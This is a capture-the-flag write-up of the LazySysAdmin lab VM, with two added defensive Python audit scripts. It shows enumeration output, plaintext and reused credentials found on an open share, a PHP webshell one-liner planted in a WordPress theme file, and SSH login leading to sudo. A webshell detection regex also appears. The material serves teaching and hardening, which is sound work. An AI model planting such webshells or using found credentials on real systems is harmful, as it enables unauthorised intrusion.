WWRDPLDN

This shall be a record of my escapades into the world of ones and zeros.

LazySysAdmin

wwrdpldnadmin | 13 October, 2017 17:59

 

I really liked the idea of this box. Having taken the OSCP and failed it just like the creator (a kindred spirit), it really appealed to me.

Netdiscover shows the IP address of the target

netdiscover -r 192.168.203.0

IP address of the target system: 192.168.203.133

First I run nmap against the IP:

Starting Nmap 7.31 ( https://nmap.org ) at 2017-10-12 15:54 EDT
Nmap scan report for 192.168.203.133
Host is up (0.00027s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
MAC Address: 00:0C:29:B8:C0:55 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds

Standard stuff, let's enumerate. I have a lot more experience poking at SMB on Windows boxes, so let's try it on Linux. (The response below has been abridged.)

root@kali-rolling:~/vulnhub/lazysysadmin# enum4linux 192.168.203.133
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Oct 12 15:55:27 2017

==========================
| Target Information |
==========================
Target ........... 192.168.203.133
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=======================================================
| Enumerating Workgroup/Domain on 192.168.203.133 |
=======================================================
[+] Got domain/workgroup name: WORKGROUP

========================================
| Session Check on 192.168.203.133 |
========================================
[+] Server 192.168.203.133 allows sessions using username '', password ''

=========================================
| OS information on 192.168.203.133 |
=========================================
[+] Got OS info for 192.168.203.133 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
[+] Got OS info for 192.168.203.133 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version  : 6.1
server type : 0x809a03

============================================
| Share Enumeration on 192.168.203.133 |
============================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename   Type  Comment
---------   ----  -------
print$      Disk  Printer Drivers
share$      Disk  Sumshare
IPC$        IPC   IPC Service (Web server)

Server        Comment
---------     -------
LAZYSYSADMIN  Web server

Workgroup     Master
---------     -------
COUNTY        IT-22331
WORKGROUP     LAZYSYSADMIN

[+] Attempting to map shares on 192.168.203.133
//192.168.203.133/print$ Mapping: DENIED, Listing: N/A
//192.168.203.133/share$ Mapping: OK, Listing: OK
//192.168.203.133/IPC$ Mapping: OK Listing: DENIED

==========================================================================
| Users on 192.168.203.133 via RID cycling (RIDS: 500-550,1000-1050) |
==========================================================================
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)

================================================
| Getting printer info for 192.168.203.133 |
================================================
No printers returned.

enum4linux complete on Thu Oct 12 15:55:43 2017
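Looking at that output from the defender's side, three lines carry the whole story: the null session, the share that an anonymous user can both map and list, and the local account exposed by RID cycling. As an added example (my own Python, not part of the original post and not part of enum4linux), here is a small triage script that reads enum4linux text in the shape above and turns those lines into structured results and a prioritised finding list with the smb.conf settings that close each hole. The sample text is a constructed abridgement of the run above.

```python
"""Triage enum4linux output for anonymous-access findings.

Added example (not part of the original post or of enum4linux): reads the
text enum4linux prints and reduces it to the findings that matter for
hardening a Samba host.
"""
import re
from typing import Dict, List

# Constructed sample, abridged to the lines the parser cares about, in the same
# shape as the real enum4linux run above.
SAMPLE_ENUM4LINUX = (
    "[+] Server 192.168.203.133 allows sessions using username '', password ''\n"
    "[+] Got OS info for 192.168.203.133 from smbclient: Domain=[WORKGROUP] "
    "OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]\n"
    "//192.168.203.133/print$ Mapping: DENIED, Listing: N/A\n"
    "//192.168.203.133/share$ Mapping: OK, Listing: OK\n"
    "//192.168.203.133/IPC$ Mapping: OK Listing: DENIED\n"
    "[+] Enumerating users using SID S-1-22-1 and logon username '', password ''\n"
    "S-1-22-1-1000 Unix User\\togie (Local User)\n"
)

NULL_SESSION_RE = re.compile(r"^\[\+\] Server (?P<host>\S+) allows sessions using username '', password ''")
BANNER_RE = re.compile(r"Server=\[(?P<banner>[^\]]+)\]")
# enum4linux prints "Mapping: OK, Listing: OK" for some shares and
# "Mapping: OK Listing: DENIED" (no comma) for others, so the comma is optional.
SHARE_MAP_RE = re.compile(r"^//(?P<host>[^/]+)/(?P<share>\S+) Mapping: (?P<map>\w+),? Listing: (?P<list>\S+)")
RID_USER_RE = re.compile(r"^S-1-22-1-(?P<rid>\d+) Unix User\\(?P<name>\S+) \(Local User\)")


def audit_enum4linux(text: str) -> Dict[str, object]:
    """Return structured results plus a list of prioritised findings."""
    null_session = False
    banner = ""
    mapped: List[str] = []
    listable: List[str] = []
    users: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if NULL_SESSION_RE.match(line):
            null_session = True
            continue
        m = BANNER_RE.search(line)
        if m and not banner:
            banner = m["banner"]
        m = SHARE_MAP_RE.match(line)
        if m:
            if m["map"] == "OK":
                mapped.append(m["share"])
                if m["list"] == "OK":
                    listable.append(m["share"])
            continue
        m = RID_USER_RE.match(line)
        if m:
            users.append(m["name"])

    findings: List[str] = []
    if null_session:
        findings.append("HIGH: null session accepted; set 'restrict anonymous = 2' and 'map to guest = Never' in smb.conf")
    for share in listable:
        if share.upper() != "IPC$":  # IPC$ is always mappable; the data shares are what matter
            findings.append(f"HIGH: share {share} is listable without credentials; set 'guest ok = no' and a 'valid users' list")
    for user in users:
        findings.append(f"MEDIUM: local account '{user}' exposed by RID cycling; anonymous lookups should be blocked")
    return {
        "null_session": null_session,
        "server_banner": banner,
        "mapped_shares": mapped,
        "anonymous_listable_shares": listable,
        "local_users": users,
        "findings": findings,
    }


if __name__ == "__main__":
    for finding in audit_enum4linux(SAMPLE_ENUM4LINUX)["findings"]:
        print(finding)
```

Feed it a saved enum4linux log (`audit_enum4linux(open("scan.txt").read())`) and the findings list is what goes into the report; the structured fields are there so the same data can be diffed between scans after the Samba config is tightened.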

Well, I found an open share and a username, good stuff.

I mounted the share$ folder and explored. It looks like I'm sitting in the webroot folder. I first try to see if I can write to this folder but I am denied.

Found the following folders in the webroot:

apache
Backnode_files
old
test
wordpress
wp

Found the following files in the webroot:

deets.txt
index.html
info.php
robots.txt
todolist.txt

I downloaded the contents to my working folder and started reading.

Found in deets.txt:

CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345

Contents of robots.txt:

User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

Carved from the WordPress wp-config.php:

define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

This user/password from wp-config.php is also the WordPress admin login at http://192.168.203.133/wordpress/wp-admin/ (the same credential is reused for the database and the CMS).

I know WordPress pretty well. It's easy to go from admin rights to system access, because an admin can edit the theme's PHP files.

I modified the theme's 404.php with a PHP one-liner that runs whatever is passed in the com parameter:

<?php system($_GET["com"]); ?>

and went to:

http://192.168.203.133/wordpress/wp-content/themes/twentyfifteen/404.php?com=ls
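Everything that made this walk-in possible sat in the webroot: deets.txt with a plaintext password, wp-config.php with a reused database credential, and now a theme file that passes request input straight to system(). As an added example (my own Python, not part of the original post), here is the audit I would run against a webroot, or a mounted copy of share$, on a schedule: it flags leftover note and diagnostic files, credentials in plaintext or in PHP define() calls (masked in the output so the report does not re-leak them), and PHP files that feed a request superglobal into a shell or eval call. The tree it scans is a constructed copy of the layout seen above, written to a temp directory, not the real files.

```python
"""Audit a webroot (or a mounted copy of it) for leftover secrets and webshells.

Added example, not code from the original post: the sample tree below is a
constructed copy of the layout seen on share$, written into a temp directory.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Files that should never be served from a webroot on a finished system.
LEFTOVER_NAMES = {"deets.txt", "todolist.txt", "info.php"}
# define('DB_USER', '...') / define('DB_PASSWORD', '...') as written in wp-config.php
PHP_CRED_RE = re.compile(r"define\(\s*'(?P<key>DB_(?:USER|PASSWORD))'\s*,\s*'(?P<val>[^']*)'\s*\)")
# A line that is nothing but "Password 12345" (whole line, so prose that merely mentions "password" is ignored)
PLAIN_PW_RE = re.compile(r"^\s*password\s*[:=]?\s*(?P<val>\S+)\s*$", re.I | re.M)
# Command execution or eval fed directly from a request superglobal
WEBSHELL_RE = re.compile(
    r"\b(?:system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"
)


def _mask(value: str) -> str:
    """Keep the first character so a finding is recognisable without re-leaking the secret."""
    return value[0] + "*" * (len(value) - 1) if value else ""


def audit_webroot(root: Path) -> List[Dict[str, str]]:
    """Walk every file under root and return a list of findings (path, kind, detail)."""
    findings: List[Dict[str, str]] = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name in LEFTOVER_NAMES:
            findings.append({"path": rel, "kind": "leftover-file", "detail": "note or diagnostic file served from webroot"})
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        for m in PHP_CRED_RE.finditer(text):
            findings.append({"path": rel, "kind": "credential", "detail": f"{m['key']}={_mask(m['val'])}"})
        if path.suffix != ".php":
            for m in PLAIN_PW_RE.finditer(text):
                findings.append({"path": rel, "kind": "credential", "detail": f"plaintext password {_mask(m['val'])}"})
        if path.suffix == ".php" and WEBSHELL_RE.search(text):
            findings.append({"path": rel, "kind": "webshell", "detail": "shell or eval call takes its argument from request input"})
    return findings


def build_sample_webroot(root: Path) -> None:
    """Constructed sample mirroring the share layout above (contents are illustrative)."""
    theme = root / "wordpress" / "wp-content" / "themes" / "twentyfifteen"
    theme.mkdir(parents=True)
    (root / "index.html").write_text("<html><body>Backnode</body></html>\n")
    (root / "robots.txt").write_text("User-agent: *\nDisallow: /old/\nDisallow: /test/\n")
    (root / "deets.txt").write_text(
        "CBF Remembering all these passwords.\n"
        "Remember to remove this file and update your password after we push out the server.\n"
        "Password 12345\n"
    )
    (root / "wordpress" / "wp-config.php").write_text(
        "<?php\ndefine('DB_NAME', 'wordpress');\ndefine('DB_USER', 'Admin');\n"
        "define('DB_PASSWORD', 'TogieMYSQL12345^^');\n"
    )
    (theme / "index.php").write_text("<?php get_header(); ?>\n")  # benign theme file
    (theme / "404.php").write_text('<?php\nsystem($_GET["com"]);\n?>\n')  # the planted one-liner


def run_demo() -> List[Dict[str, str]]:
    """Build the sample tree in a temp dir, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_webroot(root)
        return audit_webroot(root)


if __name__ == "__main__":
    for f in run_demo():
        print(f"[{f['kind']}] {f['path']}: {f['detail']}")
```

Point `audit_webroot` at `/var/www/html` (or at the mount point of the share) and any hit on a theme or plugin file that was not part of the last deployment is the thing to pull, since a legitimate theme has no reason to execute request parameters.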


I do a cat /etc/passwd and there's that user (togie) again. I have access, but I take a second to poke at SSH with the user/pass info I've recovered so far.

ssh togie@192.168.203.133 (password: 12345)

I had found the user in enum4linux and verified it using cat /etc/passwd from the com one-liner. The password was in deets.txt from mounting share$.


togie did not have rights to use cd, but ls and cat worked just fine. More surprisingly, togie has sudo rights...


And now the flag:


Not sure what these random strings are all about yet. I'll get back to you if I figure it out. The lesson to learn here is that I found everything I needed to just walk in (log in) using enumeration. I didn't have to use any outside exploits; I just exploited the poor configuration. Bravo Togie!
